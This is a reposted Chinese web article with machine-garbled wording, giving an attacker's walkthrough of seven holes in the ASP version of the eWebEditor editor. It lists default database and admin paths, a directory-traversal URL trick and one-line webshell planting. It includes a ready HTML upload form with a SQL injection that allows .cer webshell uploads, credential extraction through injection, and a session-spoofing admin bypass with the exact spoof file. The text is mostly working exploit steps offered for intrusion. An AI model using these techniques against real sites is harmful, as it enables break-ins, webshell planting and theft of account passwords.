浅析asp版本ewebeditor在线编辑器[网络技术]
本文“浅析asp版本ewebeditor在线编辑器[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
Ewebeditor编辑器目前分为asp,aspx,php,jsp四种程序,各类ewebeditor版本很多,功效强盛颇收利用者爱好,在国内利用极其遍及.关于目前asp版本的ewebeditor编辑器漏洞主要分为以下7点:
默许,遍历目录漏洞,一句话,注入,构造,cookie拐骗,社工(踩脚迹入侵),
NO1.ewebeditor编辑器普通默许数据库途径是db/ewebeditor.mdb
默许的后台途径是admin_login.asp
倡议最好检测下admin_style.asp文件能否可以直接拜候
NO2.遍历目录漏洞(具体以下):
登陆编辑器---上传文件管理---挑选款式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14背面增添&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了
此漏洞危害大大的,绝对可怕
NO3.当数据库被管理员改正成asp、asa后缀的时刻,可以插一句话木马服务端进入数据库,然后一句话木马客户端衔接拿下webshell
NO4.有的时刻爆了数据库找不到后台地址让人发急,其实可以试试查看款式表,有没别人加入的asp、asa后缀款式表,也就是虽说的踩着脚迹入侵.
还有的时刻聪明的管理员也就是加“#”无妨社工试试,我可没少占便宜的
比方:db/#ewebeditor.asa、db/#ewebeditor.asp 、db/#ewebeditor.mdb
NO5.注入2.1.6的注入就不多说了,以下保存为html文件改正action,直接上传cer马
<H1>ewebeditor asp版 2.1.6 上传漏洞操纵程序----</H1><br><br>
<form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye’
union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,
S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b’|cer’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_Medi
aSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=’standard’and’a’=’a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞
简单操纵就是
http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
默许表名:eWebEditor_System默许列名:sys_UserName、sys_UserPass,然后操纵nbsi举行猜解,对此举行注入获得账号密码
NO6.有的时刻管理员不让复制款式,但是你又看到有个款式被别人从前入侵改正了存在asa大概之类可以传shell,但是上传插入工具没有,又无法改正怎么办那?大概很多人说应当可以加工具栏,但是我就碰见过不让加的
这样我们可以操纵ewebeditor里的upload.asp文件举行本地构造举行上传具体以下: (略)
NO.7还有种方法是近来坏客发现的
操纵WebEditor session拐骗漏洞,进入后台:
漏洞文件:Admin_Private.asp
漏洞语句:
<%
If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If
只判断了session,没有判断cookies和途径的考证问题.
漏洞操纵:
新建一个amxking.asp内容以下:
<%Session("eWebEditor_User") = "11111111"%>
拜候amxking.asp,再拜候后台任何文件,for example:Admin_Default.asp
面对此种威胁网站
以上是“浅析asp版本ewebeditor在线编辑器[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |